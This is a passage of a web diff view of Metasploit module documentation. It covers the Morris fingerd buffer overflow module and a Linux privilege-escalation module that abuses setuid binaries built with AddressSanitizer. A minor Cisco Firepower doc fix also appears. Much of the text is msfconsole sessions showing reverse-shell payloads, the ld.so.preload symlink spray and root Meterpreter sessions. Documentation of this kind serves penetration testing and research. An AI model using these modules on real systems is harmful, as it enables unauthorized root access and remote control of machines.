For manual setup, please follow the Computer History Wiki's
|
||||
[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
|
||||
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
|
||||
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
|
||||
|
||||
## Targets
|
||||
|
||||
```
|
||||
Id Name
|
||||
-- ----
|
||||
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
**RPORT**
|
||||
|
||||
Set this to the target port. The default is 79 for `fingerd`, but the
|
||||
port may be forwarded when NAT (SLiRP) is used in SIMH.
|
||||
|
||||
**PAYLOAD**
|
||||
|
||||
Set this to a BSD VAX payload. Currently only
|
||||
`bsd/vax/shell_reverse_tcp` is supported.
|
||||
|
||||
## Usage
|
||||
|
||||
```
|
||||
msf5 exploit(bsd/finger/morris_fingerd_bof) > options
|
||||
|
||||
Module options (exploit/bsd/finger/morris_fingerd_bof):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
|
||||
RPORT 79 yes The target port (TCP)
|
||||
|
||||
|
||||
Payload options (bsd/vax/shell_reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85
|
||||
|
||||
|
||||
msf5 exploit(bsd/finger/morris_fingerd_bof) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.2:4444
|
||||
[*] 127.0.0.1:79 - Connecting to fingerd
|
||||
[*] 127.0.0.1:79 - Sending 533-byte buffer
|
||||
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500
|
||||
|
||||
whoami
|
||||
nobody
|
||||
cat /etc/motd
|
||||
4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986
|
||||
|
||||
Would you like to play a game?
|
||||
```
|
|
@ -0,0 +1,166 @@
|
|||
## Description
|
||||
|
||||
This module attempts to gain root privileges on Linux systems using
|
||||
setuid executables compiled with AddressSanitizer (ASan).
|
||||
|
||||
ASan configuration related environment variables are permitted when
|
||||
executing setuid executables built with libasan. The `log_path` option
|
||||
can be set using the `ASAN_OPTIONS` environment variable, allowing
|
||||
clobbering of arbitrary files, with the privileges of the setuid user.
|
||||
|
||||
This module uploads a shared object and sprays symlinks to overwrite
|
||||
`/etc/ld.so.preload` in order to create a setuid root shell.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[AddressSanitizer](https://clang.llvm.org/docs/AddressSanitizer.html) (ASan)
|
||||
is a fast memory error detector. It consists of a compiler instrumentation
|
||||
module and a run-time library.
|
||||
|
||||
An example executable can be compiled with ASan as follows:
|
||||
|
||||
```
|
||||
gcc -s -lasan -fsanitize=address -o asan.elf helloworld.c
|
||||
sudo mv asan.elf /usr/bin/asan.elf
|
||||
sudo chown root:root /usr/bin/asan.elf
|
||||
sudo chmod u+s /usr/bin/asan.elf
|
||||
```
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Get a session
|
||||
3. `use use exploit/linux/local/asan_suid_executable_priv_esc`
|
||||
4. `set SESSION [SESSION]`
|
||||
5. `set SUID_EXECUTABLE /path/to/suid/compiled/with/asan`
|
||||
6. `check`
|
||||
7. `run`
|
||||
8. You should get a new *root* session
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
**SESSION**
|
||||
|
||||
Which session to use, which can be viewed with `sessions`
|
||||
|
||||
**SUID_EXECUTABLE**
|
||||
|
||||
Path to a SUID executable compiled with ASan. (default: ``)
|
||||
|
||||
**SPRAY_SIZE**
|
||||
|
||||
Number of PID symlinks to create. (default: `50`)
|
||||
|
||||
**WritableDir**
|
||||
|
||||
A writable directory file system path. (default: `/tmp`)
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Command Shell Session (Linux Mint 19)
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/local/asan_suid_executable_priv_esc
|
||||
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out
|
||||
suid_executable => /usr/bin/a.out
|
||||
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set session 1
|
||||
session => 1
|
||||
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true
|
||||
verbose => true
|
||||
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.191.188:4444
|
||||
[+] /usr/bin/a.out is setuid
|
||||
[+] /usr/bin/a.out was compiled with ASan
|
||||
[+] gcc is installed
|
||||
[*] Writing '/tmp/.pCriI' (291 bytes) ...
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 291 bytes in 1 chunks of 937 bytes (octal-encoded), using printf
|
||||
[*] Writing '/tmp/.JtSfQ1.c' (142 bytes) ...
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 142 bytes in 1 chunks of 513 bytes (octal-encoded), using printf
|
||||
[*] Writing '/tmp/.TCLmzU.so.c' (323 bytes) ...
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 323 bytes in 1 chunks of 1167 bytes (octal-encoded), using printf
|
||||
[*] Writing '/tmp/.V7OEFt.c' (253 bytes) ...
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 253 bytes in 1 chunks of 906 bytes (octal-encoded), using printf
|
||||
[*] Writing '/tmp/.LpfTKJwR' (256 bytes) ...
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 256 bytes in 1 chunks of 942 bytes (octal-encoded), using printf
|
||||
[*] Launching exploit...
|
||||
[+] Success! /tmp/.JtSfQ1 is set-uid root!
|
||||
-rwsr-xr-x 1 root root 8384 Jan 12 19:30 /tmp/.JtSfQ1
|
||||
[*] Executing payload...
|
||||
[*] Transmitting intermediate stager...(106 bytes)
|
||||
[*] Sending stage (914728 bytes) to 172.16.191.211
|
||||
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.211:56074) at 2019-01-12 03:30:47 -0500
|
||||
[+] Deleted /tmp/.JtSfQ1.c
|
||||
[+] Deleted /tmp/.TCLmzU.so.c
|
||||
[+] Deleted /tmp/.TCLmzU.so
|
||||
[+] Deleted /tmp/.V7OEFt.c
|
||||
[+] Deleted /tmp/.V7OEFt
|
||||
[+] Deleted /tmp/.LpfTKJwR
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0
|
||||
meterpreter > sysinfo
|
||||
Computer : 172.16.191.211
|
||||
OS : LinuxMint 19 (Linux 4.15.0-20-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : i486-linux-musl
|
||||
Meterpreter : x86/linux
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Meterpreter Session (Linux Mint 19)
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/local/asan_suid_executable_priv_esc
|
||||
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set session 1
|
||||
session => 1
|
||||
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out
|
||||
suid_executable => /usr/bin/a.out
|
||||
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true
|
||||
verbose => true
|
||||
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.191.188:4444
|
||||
[+] /usr/bin/a.out is setuid
|
||||
[+] /usr/bin/a.out was compiled with ASan
|
||||
[+] gcc is installed
|
||||
[*] Writing '/tmp/.XBKiFa' (291 bytes) ...
|
||||
[*] Writing '/tmp/.ooMwKnEXt.c' (142 bytes) ...
|
||||
[*] Writing '/tmp/.cWZL3A.so.c' (329 bytes) ...
|
||||
[*] Writing '/tmp/.78iKLJOvX.c' (254 bytes) ...
|
||||
[*] Writing '/tmp/.WkXgm2agJ8' (261 bytes) ...
|
||||
[*] Launching exploit...
|
||||
[+] Success! /tmp/.ooMwKnEXt is set-uid root!
|
||||
-rwsr-xr-x 1 root root 8384 Jan 12 19:42 /tmp/.ooMwKnEXt
|
||||
[*] Executing payload...
|
||||
[*] Transmitting intermediate stager...(106 bytes)
|
||||
[*] Sending stage (914728 bytes) to 172.16.191.211
|
||||
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.211:56080) at 2019-01-12 03:42:43 -0500
|
||||
[+] Deleted /tmp/.XBKiFa
|
||||
[+] Deleted /tmp/.ooMwKnEXt.c
|
||||
[+] Deleted /tmp/.cWZL3A.so.c
|
||||
[+] Deleted /tmp/.cWZL3A.so
|
||||
[+] Deleted /tmp/.78iKLJOvX.c
|
||||
[+] Deleted /tmp/.78iKLJOvX
|
||||
[+] Deleted /tmp/.WkXgm2agJ8
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0
|
||||
meterpreter > sysinfo
|
||||
Computer : 172.16.191.211
|
||||
OS : LinuxMint 19 (Linux 4.15.0-20-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : i486-linux-musl
|
||||
Meterpreter : x86/linux
|
||||
meterpreter >
|
||||
```
|
||||
|
|
@ -24,9 +24,9 @@ https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=2862
|
|||
|
||||
## Options
|
||||
|
||||
**USERNAME** The username for Cisco Firepower Management console
|
||||
**USERNAME** The username for Cisco Firepower Management console.
|
||||
|
||||
**Password** The password for Cisco Firepower Management cosnole
|
||||
**PASSWORD** The password for Cisco Firepower Management console.
|
||||
|
||||
**NEWSSHUSER** The SSH account to create. By default, this is random.
|
||||
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue